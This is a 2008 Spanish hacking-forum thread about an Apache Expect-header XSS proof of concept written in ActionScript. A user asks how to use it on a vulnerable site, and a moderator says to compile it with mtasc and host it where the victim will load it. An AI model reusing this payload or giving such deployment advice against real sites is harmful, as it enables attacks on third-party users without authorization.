Duda exploit Apache Expect XSS

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

Duda exploit Apache Expect XSS

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: Duda exploit Apache Expect XSS (Leído 4,917 veces)

& eDu &

Desconectado

Mensajes: 580

Duda exploit Apache Expect XSS

« en: 18 Mayo 2008, 12:08 pm »

Bueno tengo este exploit

Código:

var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");

y quiero explotarlo en una web vulnerable a el, pero no se como, si lo saben diganmelo. Gracias


« Última modificación: 12 Agosto 2008, 16:42 pm por sirdarckcat »	En línea

Azielito

no es
Colaborador

Desconectado

Mensajes: 9.188

>.<

Re: ¿Como lo ejecuto?

« Respuesta #1 en: 19 Mayo 2008, 18:59 pm »

Pues que sistema es ese?

a simple vista es una web hecha en AJAX y ese es codigo javascript, pos la puees ejecutar desde la barra de direcciones

Código

javascript:var req:LoadVars=new LoadVars();req.addRequestHeader("Expect","<script>alert('gotcha!')</script>");req.send("http://www.target.site/","_blank","GET");

pero debes encontrar esa web vulnerable, de donde sacaste ese codigo?
o sea, pasa la url para ver para que sistema es xD


« Última modificación: 12 Agosto 2008, 16:41 pm por sirdarckcat »	En línea

& eDu &

Desconectado

Mensajes: 580

Re: ¿Como lo ejecuto?

« Respuesta #2 en: 19 Mayo 2008, 19:17 pm »

x.es
¿Que pongo en la url
www.x.es/javascript:var req:LoadVars=new LoadVars();req.addRequestHeader("Expect","<script>alert('gotcha!')</script>");req.send("http://www.target.site/","_blank","GET")

?


« Última modificación: 19 Mayo 2008, 20:26 pm por Mojambalupe »	En línea

Azielito

no es
Colaborador

Desconectado

Mensajes: 9.188

>.<

Re: ¿Como lo ejecuto?

« Respuesta #3 en: 19 Mayo 2008, 20:21 pm »

mmmhhh.. no, vas a tener que cargar el JS dara error por el ":" del var req:LoadVars ¬¬

Mirate los post pegados para que entiendas mejor de que se trata...

no recuerdo si hay info sobre eso xDD mejor lee lo que tenemos por aca
http://www.elhacker.net/jasildbg/

Tantes que leas algo mejor lee esto que te servira bastante

http://foro.elhacker.net/bugs_y_exploits/taller_introduccion_a_los_bugs_a_nivel_web-t173509.0.html

Cuando termines de leer este entonces sigues con este

https://foro.elhacker.net/bugs_y_exploits/taller_de_introduccion_a_bugsexploits_1deg-t103198.0.html

y ya luego lees el de jasildbg


« Última modificación: 19 Mayo 2008, 20:33 pm por Azielito »	En línea

sirdarckcat

Aspirante a supervillano
Moderador

Desconectado

Mensajes: 7.029

No estoy loco, soy mentalmente divergente

Re: ¿Como lo ejecuto?

« Respuesta #4 en: 20 Mayo 2008, 16:24 pm »

eso es flash jaja

compila ese codigo con mtasc, y subelo a una web que vea tu victima y yap


	En línea

Leer reglas

- WarZone.elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Automatización a la hora de navegar con EXPECT GNU/Linux	JonaLamper	2	2,773	4 Junio 2013, 08:03 am por RyogiShiki
	Ayuda sobre apache, exploit y vulnerabilidades Hacking	ElCondor1997	4	4,289	6 Agosto 2013, 11:06 am por darkvidhack